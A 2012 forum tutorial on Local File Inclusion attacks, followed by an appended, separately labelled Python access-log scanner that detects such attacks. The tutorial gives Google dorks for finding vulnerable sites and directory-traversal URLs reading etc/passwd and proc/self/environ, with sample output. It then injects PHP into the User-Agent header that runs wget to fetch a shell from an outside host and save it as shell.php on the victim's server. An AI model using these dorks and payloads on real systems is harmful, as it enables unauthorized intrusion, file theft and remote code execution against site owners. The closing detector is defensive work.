LFI Tutorial 11-10-2012, 09:37 AM
#1
Hello, I'm writing about LFI; hope you like it.
What is LFI?
Code:
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.
-Hakipedia
Finding a vulnerable site.
Here are some Google dorks:
Code:
inurl:redirect.php?page=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
Testing for vulnerability.
OK, testing a website for LFI isn't so hard. Let's say that my URL is www.site.com/view.php?page=pictures.
Change the text after = to ../
Code:
www.site.com/view.php?page=../
An error should pop up.
Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/site.com/view.php on line 1337
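If the error is similar to this, then there is a big chance that the site is vulnerable. Now type etc/passwd after the ../
Code: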
www.site.com/view.php?page=../etc/passwd
If you get the same error, go some directories up (add more ../). If you get different text, you have successfully included the etc/passwd file. Here is an example of what you get:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
OK, now let's check for proc/self/environ.
Just replace etc/passwd with proc/self/environ.
Code:
www.site.com/view.php?page=../proc/self/environ
Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.site.com Port 80
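If you get output like the above, proc/self/environ is accessible. If you get a blank page, proc/self/environ isn't accessible or the OS is FreeBSD.
Exploiting
Now let's inject a shell on the site.
You will need the Tamper Data add-on for Firefox.
Start Tamper Data and refresh/request the /proc/self/environ URL.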
Code:
Tamper Data started.
www.site.com/view?page=../proc/self/environ
And change the User-Agent to this code.
Code:
<?system(‘wget www.link-to-your-shell.com/shell.txt -O shell.php’);?>
Replace www.link-to-your-shell.com/shell.txt with the link to your shell.
Now, to check if the upload was successful, go to www.site.com/shell.php
If it was uploaded, you have successfully attacked the site!
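Seen from the defender's side, every request described in this post leaves a trace in the web server's access log. The following is an added example, not part of the original post: it flags directory traversal in the query string (including double-encoded forms), references to etc/passwd or proc/self/environ, and PHP open tags in the User-Agent. The combined log format, the sample lines, the IP addresses and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed "combined" format: ip - - [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$')
TRAVERSAL = re.compile(r'\.\.[/\\]')                   # ../ or ..\
SENSITIVE = re.compile(r'(?:^|[/\\=])(?:etc/passwd|proc/self/environ)', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=|\s|[a-z_])', re.I)  # PHP open tag inside a header

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so ..%2F and ..%252F both normalise to ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of LFI indicators found in one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return {"unparsed"}  # never silently skip lines the parser cannot read
    findings = set()
    query = fully_decode(m["target"].partition("?")[2])
    if TRAVERSAL.search(query):
        findings.add("traversal")
    if SENSITIVE.search(query):
        findings.add("sensitive-file")
    if PHP_TAG.search(m["agent"]):
        findings.add("php-in-user-agent")
    return findings

def scan(lines):
    """Return (line_index, sorted indicators) for every suspicious line."""
    hits = ((i, classify(line)) for i, line in enumerate(lines))
    return [(i, sorted(found)) for i, found in hits if found]

# Constructed sample log lines (documentation IP ranges, harmless placeholder in the agent).
SAMPLE = [
    '192.0.2.10 - - [10/Nov/2012:09:40:01 +0000] "GET /view.php?page=pictures HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Nov/2012:09:41:12 +0000] "GET /view.php?page=../ HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Nov/2012:09:41:40 +0000] "GET /view.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Nov/2012:09:43:05 +0000] "GET /view.php?page=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 2048 "-" "<?php /* constructed placeholder */ ?>"',
]

if __name__ == "__main__":
    for index, found in scan(SAMPLE):
        print(index, found)
```

A hit on these patterns followed by a 200 response with an unusual body size is worth triaging first, since the post's own test relies on the server returning file contents instead of an include() warning.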